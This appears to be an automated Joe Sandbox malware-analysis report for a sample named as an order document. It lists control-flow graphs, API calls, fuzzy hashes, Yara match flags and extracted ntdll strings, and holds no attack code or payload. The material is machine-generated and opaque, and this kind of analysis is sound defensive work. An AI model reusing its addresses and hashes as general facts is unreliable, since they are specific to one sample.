                                                                                            Total number of Nodes:150
                                                                                            Total number of Limit Nodes:12

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 238 417d93-417dbc call 42f963 242 417dc2-417dd0 call 42ff63 238->242 243 417dbe-417dc1 238->243 246 417de0-417df1 call 42e413 242->246 247 417dd2-417ddd call 430203 242->247 252 417df3-417e07 LdrLoadDll 246->252 253 417e0a-417e0d 246->253 247->246 252->253
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                            • Instruction ID: 385d25a5890e535b671e8489fc5c15413f11f33979a04f95b97c19e2b76df75d
                                                                                            • Opcode Fuzzy Hash: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                            • Instruction Fuzzy Hash: 720112B5E0020DA7DF10DAA5DC42FDEB7789B54308F4041AAE91897241F635EB588795

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 264 42ccc3-42ccff call 404a63 call 42df13 NtClose
                                                                                            APIs
                                                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCFA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 081854369c831ec027b45b511c34f41f77e81ad7b19e29eddcfbdd3c68e28a6d
                                                                                            • Instruction ID: 491dd4956e3916c0e9f385bdf292c0db9586272939a91a9bce0c87017d490f7f
                                                                                            • Opcode Fuzzy Hash: 081854369c831ec027b45b511c34f41f77e81ad7b19e29eddcfbdd3c68e28a6d
                                                                                            • Instruction Fuzzy Hash: CAE04F713002147BC520EA5ADC41F9B775CDFC5714F404419FA4867241C771B90187B5

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 278 1942b60-1942b6c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: a2986942f912986ad9d35b6065559cfff9edf2fc54500051fb01ad50af5466c0
                                                                                            • Instruction ID: 781bdac44dcaa942e305f41a13ad1a71c9294f0a9537ecd9ef78c0f0dad760b4
                                                                                            • Opcode Fuzzy Hash: a2986942f912986ad9d35b6065559cfff9edf2fc54500051fb01ad50af5466c0
                                                                                            • Instruction Fuzzy Hash: 8D900261202500034245B1594418616804E97E0201B55C021F5055590DC52589916725
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5e923df62e25c337fe6d463c3553fc1feadbaac9da54bb36f1dea9c41fa669a8
                                                                                            • Instruction ID: b88ec5dfcee6c88d97523c6223c1000f824802ea6d0b3becf0bf10ae39d0a0b4
                                                                                            • Opcode Fuzzy Hash: 5e923df62e25c337fe6d463c3553fc1feadbaac9da54bb36f1dea9c41fa669a8
                                                                                            • Instruction Fuzzy Hash: 6390023120150413D251B1594508707404D97D0241F95C412B4465558DD6568A52A721
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c18d06a56d005c348813f5255d8ace877cd0c045bb3838374f6f65182b0766a8
                                                                                            • Instruction ID: 4fa48646e9f6e5bf8766a49ffc639f747e4e0d585fe0712b5b6681a78226a8ab
                                                                                            • Opcode Fuzzy Hash: c18d06a56d005c348813f5255d8ace877cd0c045bb3838374f6f65182b0766a8
                                                                                            • Instruction Fuzzy Hash: 8D90023120158802D250B159840874A404997D0301F59C411B8465658DC69589917721
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8c276de4c4438852bad5cbfbdd9bdd06b760b602b1166b4a464b1f9c37687da5
                                                                                            • Instruction ID: 695c8cae8014269572ea4c06d69936cedbfc6ac427fced88eb6c39818b69df1f
                                                                                            • Opcode Fuzzy Hash: 8c276de4c4438852bad5cbfbdd9bdd06b760b602b1166b4a464b1f9c37687da5
                                                                                            • Instruction Fuzzy Hash: 6490023160560402D240B1594518706504997D0201F65C411B4465568DC7958A516BA2

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: D7825j9$D7825j9
                                                                                            • API String ID: 0-479102426
                                                                                            • Opcode ID: df20b4b58c554ac0c4dc47cdb80d5ce8067fd209ea73ad874dc7f26add9bc350
                                                                                            • Instruction ID: fdfec03389ff8d0d5fb4535a71bf58f746a23e156887118081a355f29c6d436d
                                                                                            • Opcode Fuzzy Hash: df20b4b58c554ac0c4dc47cdb80d5ce8067fd209ea73ad874dc7f26add9bc350
                                                                                            • Instruction Fuzzy Hash: F8219E72900228BFCB219AA59CC1DDFFBBCDEC5728B40865AF58497502C6399D478791

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 22 4145b1-4145c5 23 4145cd-41461d call 42f833 call 417d93 call 4049d3 call 425423 22->23 24 4145c8 call 42ee23 22->24 33 41463d-414643 23->33 34 41461f-41462e PostThreadMessageW 23->34 24->23 34->33 35 414630-41463a 34->35 35->33
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(D7825j9,00000111,00000000,00000000), ref: 0041462A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID: D7825j9$D7825j9
                                                                                            • API String ID: 1836367815-479102426
                                                                                            • Opcode ID: 994b2baca817a775ab033900383bfd5bf9339bcaebf1deb497ed5a9e65605e91
                                                                                            • Instruction ID: 07308d344231523ff006cd4a3a6d710053bcb018325491c76687a8e41311cea5
                                                                                            • Opcode Fuzzy Hash: 994b2baca817a775ab033900383bfd5bf9339bcaebf1deb497ed5a9e65605e91
                                                                                            • Instruction Fuzzy Hash: 0D0108B1D0025C7AEB10AAE19C82DEFBB7C9F8179CF448069F904B7141D67C4E068BA5

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 36 4145b3-4145c5 37 4145cd-41461d call 42f833 call 417d93 call 4049d3 call 425423 36->37 38 4145c8 call 42ee23 36->38 47 41463d-414643 37->47 48 41461f-41462e PostThreadMessageW 37->48 38->37 48->47 49 414630-41463a 48->49 49->47
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(D7825j9,00000111,00000000,00000000), ref: 0041462A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID: D7825j9$D7825j9
                                                                                            • API String ID: 1836367815-479102426
                                                                                            • Opcode ID: 6bfd8d0c22e0fa00295c46644b34a77d52c024928958fe0a7e538a0ad19628b1
                                                                                            • Instruction ID: 29429dc466ea38f9ee7d023a718d0d20093d2d2b0bd9a22da0fd0cacc4ae9ed7
                                                                                            • Opcode Fuzzy Hash: 6bfd8d0c22e0fa00295c46644b34a77d52c024928958fe0a7e538a0ad19628b1
                                                                                            • Instruction Fuzzy Hash: BA01C8B1D0025C7ADB10AAE19C82DEFBB7C9F81758F408069F90467141D67C5E0647A5

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 259 42d033-42d077 call 404a63 call 42df13 RtlFreeHeap
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,13A0E445,00000007,00000000,00000004,00000000,00417604,000000F4), ref: 0042D072
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 60ff4789dde42194b856a07be318009ab749fac2426b1be3e6f4cf8e154f64d5
                                                                                            • Instruction ID: 377c83c61a208b248498eacd654a30d0caa489a199ddfc83a98deeb9492c08bc
                                                                                            • Opcode Fuzzy Hash: 60ff4789dde42194b856a07be318009ab749fac2426b1be3e6f4cf8e154f64d5
                                                                                            • Instruction Fuzzy Hash: 32E09AB2604204BBDA10EE99EC41F9B73ECEFC8714F00001AFA08B7242C671BD108BB8

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 254 42cfe3-42d027 call 404a63 call 42df13 RtlAllocateHeap
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(?,0041EB44,?,?,00000000,?,0041EB44,?,?,?), ref: 0042D022
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 1e5b17512e1e55516f8326c9c16891b6268a9042548c139125952dda1877ec81
                                                                                            • Instruction ID: f0988cf84ecf2190b66b4d66ddb23bf1359071760aad22573dab5754c81dd051
                                                                                            • Opcode Fuzzy Hash: 1e5b17512e1e55516f8326c9c16891b6268a9042548c139125952dda1877ec81
                                                                                            • Instruction Fuzzy Hash: 61E06D716442057FCA14EF59DC41F9B77ACDFC8710F000019F908A7242D770B9118BB8

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 269 42d083-42d0bc call 404a63 call 42df13 ExitProcess
                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,313397DD,?,?,313397DD), ref: 0042D0B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: 8548100c12659e7f60cf6d297a0857bfa3cf992d76b92ca8445e0e6cfb24f460
                                                                                            • Instruction ID: 526304a0a7fea171b927583e1600790b502b234eda972d78423b64fab7b68b37
                                                                                            • Opcode Fuzzy Hash: 8548100c12659e7f60cf6d297a0857bfa3cf992d76b92ca8445e0e6cfb24f460
                                                                                            • Instruction Fuzzy Hash: D3E086752402147BDA20EB5ADC41FD7779CDFC5710F404429FA09A7142C675BA4187F8

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 274 1942c0a-1942c0f 275 1942c11-1942c18 274->275 276 1942c1f-1942c26 LdrInitializeThunk 274->276
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 2853b0bf168de2edc9cdd16f8a53fadb0e8054a3cf21c660245a470b6986e42b
                                                                                            • Instruction ID: ffda595f58be86621a48712c972bbf4c2eb58e511873b095641db5e5f09c3a0b
                                                                                            • Opcode Fuzzy Hash: 2853b0bf168de2edc9cdd16f8a53fadb0e8054a3cf21c660245a470b6986e42b
                                                                                            • Instruction Fuzzy Hash: 92B09B71D015C5C6DB51E764560CB17794477D0702F15C061F2070641F4778C1D1E775
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-2160512332
                                                                                            • Opcode ID: 14a836881f8b090d09a48607ad6aa5d7e5cdb5c791c2db647cafb8c7289ba40c
                                                                                            • Instruction ID: 206f3d79f1f89dffcb43c06b9708f7d851c775cd21a2bdc2996892bd2f77d5b5
                                                                                            • Opcode Fuzzy Hash: 14a836881f8b090d09a48607ad6aa5d7e5cdb5c791c2db647cafb8c7289ba40c
                                                                                            • Instruction Fuzzy Hash: FB929071608342AFE721EF19C880F6BBBE8BB84754F04492DFA99D7290D774E944CB52
                                                                                            Strings
                                                                                            • 8, xrefs: 019752E3
                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019754E2
                                                                                            • undeleted critical section in freed memory, xrefs: 0197542B
                                                                                            • double initialized or corrupted critical section, xrefs: 01975508
                                                                                            • Critical section address., xrefs: 01975502
                                                                                            • Critical section debug info address, xrefs: 0197541F, 0197552E
                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0197540A, 01975496, 01975519
                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019754CE
                                                                                            • Critical section address, xrefs: 01975425, 019754BC, 01975534
                                                                                            • Invalid debug info address of this critical section, xrefs: 019754B6
                                                                                            • Address of the debug info found in the active list., xrefs: 019754AE, 019754FA
                                                                                            • Thread identifier, xrefs: 0197553A
                                                                                            • corrupted critical section, xrefs: 019754C2
                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01975543
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                            • API String ID: 0-2368682639
                                                                                            • Opcode ID: ef7392d864993173cac63898f455f3b2f4371b7dde20ada268f44aaae9c7f426
                                                                                            • Instruction ID: 5b9f56dd1f4c21e262cdca9f6711748108fcb2d30180e6669f7b3a3fd131ba68
                                                                                            • Opcode Fuzzy Hash: ef7392d864993173cac63898f455f3b2f4371b7dde20ada268f44aaae9c7f426
                                                                                            • Instruction Fuzzy Hash: E0817B71A00358EBEB60CF99C884FAEBBF9AF49704F154119F508F7290D375AA41CB60
                                                                                            Strings
                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019722E4
                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0197261F
                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01972498
                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01972624
                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019724C0
                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01972412
                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01972506
                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01972409
                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01972602
                                                                                            • @, xrefs: 0197259B
                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019725EB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                            Strings
                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                            Strings
                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                            Strings
                                                                                            • VerifierDebug, xrefs: 01988CA5
                                                                                            • VerifierFlags, xrefs: 01988C50
                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01988B8F
                                                                                            • VerifierDlls, xrefs: 01988CBD
                                                                                            • HandleTraces, xrefs: 01988C8F
                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01988A3D
                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01988A67
                                                                                            Strings
                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                            Strings
                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                            Strings
                                                                                            • LdrpInitShimEngine, xrefs: 019599F4, 01959A07, 01959A30
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01959A11, 01959A3A
                                                                                            • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01959A2A
                                                                                            • apphelp.dll, xrefs: 018F6496
                                                                                            • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 019599ED
                                                                                            • Getting the shim user exports failed with status 0x%08lx, xrefs: 01959A01
                                                                                            • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01978181, 019781F5
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0193C6C3
                                                                                            • LdrpInitializeImportRedirection, xrefs: 01978177, 019781EB
                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 019781E5
                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01978170
                                                                                            • LdrpInitializeProcess, xrefs: 0193C6C4
                                                                                            Strings
                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01972160, 0197219A, 019721BA
                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0197219F
                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01972178
                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01972180
                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019721BF
                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01972165
                                                                                            APIs
                                                                                              • Part of subcall function 01942DF0: LdrInitializeThunk.NTDLL ref: 01942DFA
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940BA3
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940BB6
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940D60
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940D74
                                                                                            Strings
                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01938421
                                                                                            • @, xrefs: 01938591
                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0193855E
                                                                                            • LdrpInitializeProcess, xrefs: 01938422
                                                                                            Strings
                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019721D9, 019722B1
                                                                                            • .Local, xrefs: 019328D8
                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019722B6
                                                                                            • SXS: %s() passed the empty activation context, xrefs: 019721DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                            • API String ID: 0-1239276146
                                                                                            Strings
                                                                                            • RtlDeactivateActivationContext, xrefs: 01973425, 01973432, 01973451
                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01973437
                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01973456
                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0197342A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                            • API String ID: 0-1245972979
                                                                                            Strings
                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01960FE5
                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01961028
                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019610AE
                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0196106B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                            • API String ID: 0-1468400865
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0196A9A2
                                                                                            • LdrpDynamicShimModule, xrefs: 0196A998
                                                                                            • apphelp.dll, xrefs: 01922462
                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0196A992
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-176724104
                                                                                            Strings
                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0191327D
                                                                                            • HEAP[%wZ]: , xrefs: 01913255
                                                                                            • HEAP: , xrefs: 01913264
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
